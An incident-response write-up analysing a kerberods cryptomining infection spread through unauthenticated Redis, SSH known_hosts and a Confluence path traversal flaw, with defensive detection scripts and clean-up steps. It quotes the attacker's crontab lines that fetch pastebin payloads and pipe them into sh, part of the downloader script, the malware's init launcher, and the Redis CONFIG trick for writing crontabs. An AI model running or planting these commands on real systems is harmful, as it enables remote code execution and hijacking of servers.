Redis Unauthenticated Access and a Security Group Hole Lead to kerberods Cryptomining

References

https://www.freebuf.com/articles/web/94237.html
https://4hou.win/wordpress/?p=7973
https://www.4hou.com/vulnerable/13843.html
https://laucyun.com/17e194c26e4554cab975aae760bad553.html

Symptoms
Server CPU usage spiked.
Time of the incident: 2019.4.10 17:50.
top and htop show only one CPU; the machine normally has four.

Troubleshooting
Investigation turned up an abnormal crontab:

[root@VM_3_114_centos ~]# crontab -l
*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh

Quick containment first
Renamed curl, wget, yum and similar tools, stopped the cron service, removed the crontab entry and made root's cron file immutable (chattr +i), and added a bogus /etc/hosts entry for pastebin.com so the downloader can no longer resolve it. That stopped the bleeding for the moment.

Then the analysis
I ran the script by hand to see what it does (it can also be read at https://pastebin.com/raw/xmxHzu5P); it drops the trojan launcher as /usr/sbin/kerberods.
Searching afterwards showed that this malware compromised a large number of Linux hosts in a short time. It spreads in three ways:

  • Reads the IP list from known_hosts, logs in to the hosts that trust this one, and makes them execute malicious commands
  • Abuses the two common Redis misconfigurations, unauthenticated access and weak passwords, to make the target execute malicious commands
  • Brute-forces weak SSH passwords, then makes the target execute malicious commands

The script fetched with the renamed wget (the listing is cut off at the end):

[root@VM_3_114_centos tmp]# wgetold -q -O- https://pastebin.com/raw/xmxHzu5P
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

mkdir -p /tmp
chmod 1777 /tmp
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9
apt-get install curl -y||yum install curl -y||apk add curl -y
apt-get install cron -y||yum install crontabs -y||apk add cron -y
systemctl start crond
systemctl start cron
systemctl start crontab
service 

Find which files were modified at the time of the incident

[root@VM_3_114_centos / ]#find ./ -mtime -1 -type f  -exec ls -lt {} \; | grep "17:50"
-rw-r--r-- 1 root root 9216 Apr 10 17:50 ./etc/pki/nssdb/cert9.dbold
-rw-r--r-- 1 root root 11264 Apr 10 17:50 ./etc/pki/nssdb/key4.dbold
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/ld.so.cache
-rw-r--r-- 1 root root 35773 Apr 10 17:50 ./etc/crond.d/tomcat
-rw-r--r-- 1 root root 17 Apr 10 17:50 ./run/systemd/system/session-460352.scope
-rw-r--r-- 1 root root 17 Apr 10 17:50 ./run/systemd/system/session-460351.scope
-rw------- 1 root root 28903 Apr 10 17:50 ./var/cache/ldconfig/aux-cache
-rw-r--r-- 1 root root 0 Apr 10 17:50 ./var/cache/yum/x86_64/7/timedhosts.txt
-rw-r--r-- 3 root root 6 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/checksum_type
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/from_repo_revision
-rw-r--r-- 1 root root 36 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/var_uuid
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/from_repo_timestamp
-rw-r--r-- 1 root root 87 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/origin_url
-rw-r--r-- 1 root root 64 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/checksum_data
-rw-r--r-- 1 root root 5 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/var_infra
-rw-r--r-- 3 root root 15 Apr 10 17:50 ./var/lib/yum/yumdb/c/63b6311ebd291411c3e991f4266bb07031a53fad-curl-7.29.0-51.el7-x86_64/command_line
-rw-r--r-- 3 root root 6 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/checksum_type
-rw-r--r-- 1 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/from_repo_revision
-rw-r--r-- 1 root root 36 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/var_uuid
-rw-r--r-- 1 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/from_repo_timestamp
-rw-r--r-- 1 root root 97 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/origin_url
-rw-r--r-- 1 root root 64 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/checksum_data
-rw-r--r-- 1 root root 5 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/var_infra
-rw-r--r-- 3 root root 15 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/command_line
-rw-r--r-- 1 root root 7 Apr 10 17:50 ./var/lib/yum/yumdb/n/77651d1cdf0adc19dafdecb490426f20e15f8554-nss-pem-1.0.3-5.el7_6.1-x86_64/from_repo
-rw-r--r-- 3 root root 6 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/checksum_type
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/from_repo_revision
-rw-r--r-- 1 root root 36 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/var_uuid
-rw-r--r-- 2 root root 10 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/from_repo_timestamp
-rw-r--r-- 1 root root 90 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/origin_url
-rw-r--r-- 1 root root 64 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/checksum_data
-rw-r--r-- 1 root root 5 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/var_infra
-rw-r--r-- 3 root root 15 Apr 10 17:50 ./var/lib/yum/yumdb/l/28abae6a2a790b33d342f09c6eb881cff0b30f19-libcurl-7.29.0-51.el7-x86_64/command_line
-rw-------. 1 root root 896000 Apr 10 17:50 ./var/lib/yum/history/history-2016-04-21.sqlite
-rw-r--r-- 1 root root 3597 Apr 10 17:50 ./var/lib/yum/history/2016-04-21/21/config-main
-rw-r--r-- 1 root root 8391 Apr 10 17:50 ./var/lib/yum/history/2016-04-21/21/config-repos
-rw-r--r-- 1 root root 1722 Apr 10 17:50 ./var/lib/yum/history/2016-04-21/21/saved_tx
-rw-------. 1 root root 33536 Apr 10 17:50 ./var/lib/yum/history/history-2016-04-21.sqlite-journal
-rw-r--r-- 1 root root 45 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/version
-rw-r--r-- 1 root root 2692 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/conflicts
-rw-r--r-- 1 root root 3105 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/obsoletes
-rw-r--r-- 1 root root 60927 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/pkgtups-checksums
-rw-r--r-- 1 root root 23303 Apr 10 17:50 ./var/lib/yum/rpmdb-indexes/file-requires
-rw-r--r--. 1 root root 12288 Apr 10 17:50 ./var/lib/rpm/Installtid
-rw-r--r--. 1 root root 2273280 Apr 10 17:50 ./var/lib/rpm/Dirnames
-rw-r--r--. 1 root root 40960 Apr 10 17:50 ./var/lib/rpm/Sigmd5
-rw-r--r--. 1 root root 65536 Apr 10 17:50 ./var/lib/rpm/Sha1header
-rw-r--r--. 1 root root 36864 Apr 10 17:50 ./var/lib/rpm/Name
-rw-r--r--. 1 root root 73367552 Apr 10 17:50 ./var/lib/rpm/Packages
-rw-r--r--. 1 root root 8192 Apr 10 17:50 ./var/lib/rpm/Conflictname
-rw-r--r--. 1 root root 20480 Apr 10 17:50 ./var/lib/rpm/Group
-rw-r--r--. 1 root root 188416 Apr 10 17:50 ./var/lib/rpm/Requirename
-rw-r--r--. 1 root root 1617920 Apr 10 17:50 ./var/lib/rpm/Providename
-rw-r--r--. 1 root root 3084288 Apr 10 17:50 ./var/lib/rpm/Basenames
-rw------- 1 root root 161 Apr 10 17:50 ./var/log/yum.log

Finding the problem file
One file stood out. It had not been deleted, it is binary (readable with xxd), and it looks roughly like the dump below. The odd part is that it is in Redis dump format and even carries a Redis version string; a bit of googling confirmed that a Redis instance with no password really can be abused this way.

[root@VM_3_114_centos / ]#cat /etc/crond.d/tomcat
REDIS 0008%09 redis-ver4.0.6 redis-bits ??used-memq
t??time@Gts????eecˉused-memP
*/15 * * * * root wget -q -O- https://pastebin.com/raw/v5XC0BJh|sh
##
caches@F
*/10 * * * * root curl -fsSL https://pastebin.com/raw/v5XC0BJh|sh
##

Replaying the attack through the Redis unauthenticated-access hole
Below is how the two common Redis misconfigurations, unauthenticated access and weak passwords, were used to get commands executed on this host. Both keys hold crontab lines, and dir and dbfilename have been changed (via CONFIG SET, which an unauthenticated client is free to issue) to the cron spool and the file name root, so a SAVE writes the RDB dump out as /var/spool/cron/crontabs/root. That is exactly the kind of file found as /etc/crond.d/tomcat above, and cron picked up the lines embedded in it.

[root@VM_3_114_centos ~]# redis-cli 
127.0.0.1:6379> KEYS *
1) "runtime"
2) "caches"
127.0.0.1:6379> GET runtime
"\n*/15 * * * * wget -q -O- https://pastebin.com/raw/v5XC0BJh|sh\n##\n"
127.0.0.1:6379> get caches
"\n*/10 * * * * curl -fsSL https://pastebin.com/raw/v5XC0BJh|sh\n##\n"
127.0.0.1:6379> 
127.0.0.1:6379> DEL runtime
(integer) 1
127.0.0.1:6379> del caches
(integer) 1
127.0.0.1:6379> KEYS *
(empty list or set)
127.0.0.1:6379> CONFIG GET dir
1) "dir"
2) "/var/spool/cron/crontabs"
127.0.0.1:6379> CONFIG GET dbfilename
1) "dbfilename"
2) "root"
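
The dump-in-cron trick above and the suspicious /etc/crond.d/tomcat file are the two things a responder has to recognise quickly. The following is an added example (not code from the original post or from any of the referenced write-ups): it checks a blob for the RDB magic header, decodes the aux fields (redis-ver, redis-bits, ctime, used-mem) that show up as garbage in the cat output, pulls download-and-pipe crontab lines out of the blob wherever they sit, and flags a CONFIG GET dir/dbfilename/requirepass combination like the one in the replay. The sample dump is constructed to mirror the runtime and caches keys above; SENSITIVE_DIRS is my assumption about which directories matter, and the RDB parser handles only the encodings this case needs (no LZF-compressed strings).

```python
"""Added example: recognise a Redis RDB dump written into a cron directory,
recover the crontab lines inside it, and audit the CONFIG values that make the
trick work. Constructed sample data; not code from the original post."""
import re
import struct

RDB_MAGIC = b"REDIS"

# Directories an attacker points "dir" at so that SAVE lands where cron or sshd
# will read it. Assumption: this incident's cron spools plus the usual SSH target.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/etc/crond.d", "/root/.ssh", "/home/")

# A crontab line (five time fields, optional user field) that fetches a URL
# with curl or wget and pipes the result into a shell.
CRON_PIPE_RE = re.compile(
    rb"^(?:[\d*/,\-]+\s+){5}(?:[A-Za-z_][\w\-]*\s+)?\(?(?:curl|wget)\b[^\n]*\|\s*(?:ba)?sh\b[^\n]*$",
    re.M,
)


def is_rdb(data):
    """True when the blob starts with the 'REDIS' magic and a 4-digit format version."""
    return data[:5] == RDB_MAGIC and data[5:9].isdigit()


def _read_length(data, pos):
    """Decode one RDB length prefix -> (n, special, next_pos). When special is
    True, n names an integer encoding (0/1/2 = int8/int16/int32)."""
    first = data[pos]
    kind = first >> 6
    if kind == 0:                                   # 00xxxxxx: 6-bit length
        return first & 0x3F, False, pos + 1
    if kind == 1:                                   # 01xxxxxx yyyyyyyy: 14-bit length
        return ((first & 0x3F) << 8) | data[pos + 1], False, pos + 2
    if kind == 2:                                   # 10000000 + 32-bit big-endian length
        return struct.unpack(">I", data[pos + 1:pos + 5])[0], False, pos + 5
    return first & 0x3F, True, pos + 1              # 11xxxxxx: special encoding


def _read_string(data, pos):
    """Read one RDB string. Integer-encoded values come back as decimal text,
    which is how redis-cli shows them; LZF-compressed strings are out of scope."""
    n, special, pos = _read_length(data, pos)
    if not special:
        return data[pos:pos + n], pos + n
    fmt, size = {0: ("<b", 1), 1: ("<h", 2), 2: ("<i", 4)}.get(n, (None, 0))
    if fmt is None:
        raise ValueError("LZF-compressed string not handled in this example")
    return str(struct.unpack(fmt, data[pos:pos + size])[0]).encode(), pos + size


def rdb_aux_fields(data):
    """Return the aux fields (opcode 0xFA) after the header: redis-ver, redis-bits,
    ctime, used-mem ... These are the tell-tale fragments in the cat output above."""
    if not is_rdb(data):
        return {}
    pos, aux = 9, {"rdb-version": data[5:9].decode()}
    while pos < len(data) and data[pos] == 0xFA:
        key, pos = _read_string(data, pos + 1)
        val, pos = _read_string(data, pos)
        aux[key.decode("ascii", "replace")] = val.decode("ascii", "replace")
    return aux


def extract_cron_payloads(data):
    """Pull download-and-pipe crontab lines out of the blob, wherever they sit."""
    return [m.group(0).decode("ascii", "replace") for m in CRON_PIPE_RE.finditer(data)]


def audit_redis_config(cfg):
    """Flag CONFIG values that let SAVE write into cron; cfg maps names to values
    exactly as CONFIG GET returns them."""
    findings = []
    d, f = cfg.get("dir", ""), cfg.get("dbfilename", "")
    if any(d.startswith(p) for p in SENSITIVE_DIRS):
        findings.append(f"dir points into a sensitive directory: {d}")
    if not f.endswith(".rdb"):
        findings.append(f"dbfilename is not an .rdb file: {f}")
    if not cfg.get("requirepass"):
        findings.append("requirepass is empty: anyone who reaches the port has full access")
    if cfg.get("protected-mode", "yes") != "yes" and cfg.get("bind", "") in ("", "0.0.0.0"):
        findings.append("listening on all interfaces with protected-mode off")
    return findings


def _rdb_str(s):
    """Length-prefix s as RDB does for plain strings (6-bit or 14-bit length)."""
    n = len(s)
    return (bytes([n]) if n < 64 else bytes([0x40 | (n >> 8), n & 0xFF])) + s


# Constructed stand-in for /etc/crond.d/tomcat: a minimal RDB version 8 dump
# holding the two keys from the replay above (key names and lines as on the page).
RUNTIME = b"\n*/15 * * * * root wget -q -O- https://pastebin.com/raw/v5XC0BJh|sh\n##\n"
CACHES = b"\n*/10 * * * * root curl -fsSL https://pastebin.com/raw/v5XC0BJh|sh\n##\n"
SAMPLE_DUMP = (
    b"REDIS0008"
    + b"\xfa" + _rdb_str(b"redis-ver") + _rdb_str(b"4.0.6")
    + b"\xfa" + _rdb_str(b"redis-bits") + b"\xc0\x40"                 # int8-encoded 64
    + b"\xfa" + _rdb_str(b"ctime") + b"\xc2" + struct.pack("<i", 1554889800)
    + b"\xfa" + _rdb_str(b"used-mem") + b"\xc2" + struct.pack("<i", 900000)
    + b"\xfa" + _rdb_str(b"aof-preamble") + b"\xc0\x00"
    + b"\xfe\x00\xfb\x02\x00"                                          # SELECTDB 0, RESIZEDB
    + b"\x00" + _rdb_str(b"runtime") + _rdb_str(RUNTIME)               # type 0 = string
    + b"\x00" + _rdb_str(b"caches") + _rdb_str(CACHES)
    + b"\xff" + b"\x00" * 8                                            # EOF + (unchecked) CRC64
)

if __name__ == "__main__":
    print(is_rdb(SAMPLE_DUMP), rdb_aux_fields(SAMPLE_DUMP))
    print(extract_cron_payloads(SAMPLE_DUMP))
    print(audit_redis_config({"dir": "/var/spool/cron/crontabs", "dbfilename": "root", "requirepass": ""}))
```

Run it over every file under the cron spool and cron.d directories; a hit on the magic header alone is enough reason to quarantine the file, and the CONFIG GET results from any reachable instance go through audit_redis_config. The aux parser stops at the first non-0xFA opcode, so it never needs to understand the database section; the cron lines are found by pattern inside the raw blob instead.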

Checking the known_hosts file
The kerberods miner brute-forces the passwords of the hosts listed in known_hosts and also scans those hosts for an exposed port 6379; where Redis is open it uses the Redis remote-execution trick above to get passwordless SSH access to the remote server and keeps spreading from there.
[root@VM_3_114_centos .ssh]# cat known_hosts

About the kerberods trojan

  • kerberods launcher script
[root@VM_3_114_centos init.d]# cat /etc/init.d/netdns 
#! /bin/bash
#chkconfig: - 99 01
#description: kerberods daemon
#processname: /usr/sbin/kerberods
### BEGIN INIT INFO
# Provides:     /user/sbin/kerberods
# Required-Start:
# Required-Stop:
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description: kerberods deamon
# Description:          kerberods deamon
### END INIT INFO

LocalPath="/usr/sbin/kerberods"
name='kerberods'
pid_file="/tmp/.X11unix"
stdout_log="/var/log/$name.log"
stderr_log="/var/log/$name.err"
get_pid(){
    cat "$pid_file"
}
is_running(){
    [ -f "$pid_file" ] && /usr/sbin/kerberods -Pid $(get_pid) > /dev/null 2>&1
}
case "$1" in
start)
    if is_running; then
        echo "Already started"
    else
        echo "Starting $name"
        $LocalPath >>"$stdout_log" 2>> "$stderr_log" &
        echo $! > "$pid_file"
        if ! is_running; then
        echo "Unable to start, see $stdout_log and $stderr_log"
        exit 1
        fi
    fi
;;
stop)
    if is_running; then
        echo -n "Stopping $name.."
        kill $(get_pid)
        for i in {1..10}
        do
            if ! is_running; then
                break
            fi
            echo -n "."
            sleep 1
        done
        echo
        if is_running; then
            echo "Not stopped; may still be shutting down or shutdown may have failed"
            exit 1
        else
            echo "Stopped"
            if [ -f "$pid_file" ]; then
                rm "$pid_file"
            fi
        fi
    else
        echo "Not running"
    fi
;;
restart)
    $0 stop
    if is_running; then
        echo "Unable to stop, will not attempt to start"
        exit 1
    fi
    $0 start
;;
status)
    if is_running; then
        echo "Running"
    else
        echo "Stopped"
        exit 1
    fi
;;
*)
echo "Usage: $0 {start|stop|restart|status}"
exit 1
;;
esac

Finally, a summary of the clean-up steps and things to watch

  • Remove the trojan and its service entries
rm -rf /usr/sbin/kerberods
rm -rf /etc/init.d/netdns
rm -rf /etc/rc.d/rc0.d/K01netdns
rm -rf /etc/rc.d/rc1.d/K01netdns
rm -rf /etc/rc.d/rc2.d/S99netdns
rm -rf /etc/rc.d/rc3.d/S99netdns
rm -rf /etc/rc.d/rc4.d/S99netdns
rm -rf /etc/rc.d/rc5.d/S99netdns
rm -rf /etc/rc.d/rc6.d/K01netdns
rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service
rm -rf /usr/lib/systemd/system/netdns.service
  • Remove the scheduled tasks (chattr +i takes the full path, otherwise it locks a file called root in the current directory; run chattr -i before the next legitimate crontab edit)
rm -rf /etc/crond.d/tomcat
> /var/spool/cron/root ; chattr +i /var/spool/cron/root
> /var/spool/cron/crontabs/root ; chattr +i /var/spool/cron/crontabs/root
> /etc/cron.d/root ; chattr +i /etc/cron.d/root
  • In Redis, undo the attacker's dir/dbfilename changes, set requirepass, bind it to an internal address, and do not run Redis as root

  • Point pastebin.com at a dead address in /etc/hosts

  • Reboot (without a reboot some processes stay resident in memory and cannot be released)

  • If htop and top still cannot show all the cores, the cleanest fix is to redeploy the system. Check /etc/ld.so.preload as well: the find output above shows /etc/ld.so.cache regenerated at 17:50, and a preloaded library is a common way for miners to hide from ps and top

  • Check whether the servers listed in /root/.ssh/known_hosts have the same problem

  • Tighten security groups. A cloud VPC provides isolation, but that alone is not safe: without restrictive security groups, one infected server can freely attack the others
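
The clean-up list above and the known_hosts check are easy to get wrong by hand on a second or third host. What follows is an added example, not the post's own script: a sweep that looks for the dropped files named in the list (plus /tmp/.X11unix, the pid file from the netdns init script), flags cron files that are an RDB dump or carry a download-and-pipe entry, lists the hosts from root's known_hosts that need the same check, and reads /etc/ld.so.preload (my addition, reasoned from the ld.so.cache timestamp in the find output). Everything is relative to a root directory so it can run on a mounted image; the demo tree it builds in a temporary directory is constructed, with the pastebin lines copied from the page and the hostnames and key blobs made up.

```python
"""Added example: a post-incident sweep for the kerberods indicators named in
the clean-up list above, run against a directory tree (live root or a mounted
image), rehearsed here on a constructed tree. Not the page's own script."""
import os
import re
import tempfile

# Files dropped on this host, relative to the tree root (paths from the clean-up
# list; /tmp/.X11unix is the pid file the netdns init script writes).
DROPPED_FILES = ["usr/sbin/kerberods", "etc/init.d/netdns", "etc/crond.d/tomcat", "tmp/.X11unix",
                 "usr/lib/systemd/system/netdns.service",
                 "etc/systemd/system/multi-user.target.wants/netdns.service"] + [
    f"etc/rc.d/rc{n}.d/{'S99' if n in (2, 3, 4, 5) else 'K01'}netdns" for n in range(7)]

CRON_LOCATIONS = ["etc/crontab", "etc/cron.d", "etc/crond.d", "var/spool/cron", "var/spool/cron/crontabs"]

PIPE_TO_SH = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")   # download-and-pipe entry
HASHED_HOST = re.compile(r"^\|1\|")                                 # hashed known_hosts entry


def _cron_files(root):
    """Every regular file in the cron locations that exist under root."""
    for loc in CRON_LOCATIONS:
        p = os.path.join(root, loc)
        if os.path.isfile(p):
            yield p
        elif os.path.isdir(p):
            for name in sorted(os.listdir(p)):
                fp = os.path.join(p, name)
                if os.path.isfile(fp):
                    yield fp


def scan_cron(root):
    """(path, reason) for cron files that are an RDB dump (as /etc/crond.d/tomcat
    was) or carry a download-and-pipe line."""
    hits = []
    for path in _cron_files(root):
        with open(path, "rb") as fh:
            data = fh.read()
        if data.startswith(b"REDIS"):
            hits.append((path, "Redis RDB dump in a cron location"))
        for line in data.decode("latin-1").splitlines():
            if PIPE_TO_SH.search(line):
                hits.append((path, "download-and-pipe entry: " + line.strip()))
    return hits


def parse_known_hosts(text):
    """Hosts the worm could have reached from here -> (hosts, hashed_count).
    Hashed entries (|1|...) cannot be reversed without a candidate list."""
    hosts, hashed = [], 0
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if HASHED_HOST.match(line):
            hashed += 1
            continue
        for h in line.split()[0].split(","):
            h = h[1:].rsplit("]:", 1)[0] if h.startswith("[") else h   # [host]:port form
            if h not in hosts:
                hosts.append(h)
    return hosts, hashed


def sweep(root):
    """Collect every indicator under root into one report dictionary."""
    report = {"dropped": [p for p in DROPPED_FILES if os.path.lexists(os.path.join(root, p))],
              "cron": scan_cron(root), "known_hosts": [], "hashed_known_hosts": 0, "ld_preload": []}
    kh = os.path.join(root, "root/.ssh/known_hosts")
    if os.path.isfile(kh):
        with open(kh, encoding="utf-8", errors="replace") as fh:
            report["known_hosts"], report["hashed_known_hosts"] = parse_known_hosts(fh.read())
    preload = os.path.join(root, "etc/ld.so.preload")       # non-empty = hidden library, investigate
    if os.path.isfile(preload):
        with open(preload, encoding="utf-8", errors="replace") as fh:
            report["ld_preload"] = [ln.strip() for ln in fh if ln.strip()]
    return report


def build_demo_tree(root):
    """Constructed sample: some of the artefacts above plus one benign cron job."""
    def put(rel, content):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(content)
    put("usr/sbin/kerberods", b"ELF placeholder")
    put("etc/init.d/netdns", b"#! /bin/bash\n")
    put("etc/crond.d/tomcat", b"REDIS0008\xfa\x09redis-ver\x054.0.6\n"
        b"*/15 * * * * root wget -q -O- https://pastebin.com/raw/v5XC0BJh|sh\n##\n")
    put("var/spool/cron/root", b"*/15 * * * * (curl -fsSL https://pastebin.com/raw/xmxHzu5P"
        b"||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh\n")
    put("etc/cron.d/backup", b"0 2 * * * root /usr/local/bin/backup.sh\n")
    put("root/.ssh/known_hosts", b"10.0.3.115,10.0.3.116 ssh-rsa AAAA\n"
        b"[db01]:2222 ecdsa-sha2-nistp256 AAAA\n|1|c2FsdA==|aGFzaA== ssh-ed25519 AAAA\n")


def demo():
    """Build the sample tree in a temp dir, sweep it and return the report."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return sweep(tmp)
```

On a real host call sweep("/") as root, or sweep on the mount point of a snapshot taken before clean-up so the evidence survives the rm commands. The hosts in the known_hosts list are the ones to check next for an exposed 6379 and for the same dropped files; hashed entries only tell you how many neighbours you cannot enumerate from this file alone.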

Root cause found afterwards

Advisory
Confluence path traversal vulnerability security alert (CVE-2019-3398)
Risk level
Critical
Summary
Tencent Cloud Security Center recently observed a security advisory published by Confluence disclosing a path traversal vulnerability in the downloadallattachments resource of Confluence Server and Data Center; an attacker can use it to write a malicious file and achieve code execution. To avoid impact to your business, Tencent Cloud Security Center recommends that you carry out a security self-check promptly and, if you are within the affected range, update and patch in time to avoid intrusion by external attackers.

Reverse-engineering the chain
Port 80 of the Confluence site was open to the internet. The attacker exploited the vulnerability to download the malware onto the Confluence server; the malware then used .ssh/known_hosts to scan those servers and their subnet for Redis, and wherever Redis was unauthenticated it ran the sequence of Redis tricks shown above, writing the download-and-execute job into the cron schedule through Redis. Even where the internal network has no Redis at all, it still tries brute force against internal servers, so weak internal passwords are just as much a disaster area. Cloud server security matters; otherwise the malware spreads across the whole cloud environment.
